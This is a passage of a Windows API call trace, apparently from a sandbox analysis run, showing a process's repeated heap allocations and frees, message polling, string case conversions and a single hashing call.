(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.749] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.749] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.750] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0257.750] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.750] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.750] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.751] CryptHashData (hHash=0xaa57a0, pbData=0x24b1768, dwDataLen=0x3, dwFlags=0x1) returned 1 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.756] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.756] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.756] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.757] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.758] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.758] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.758] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) 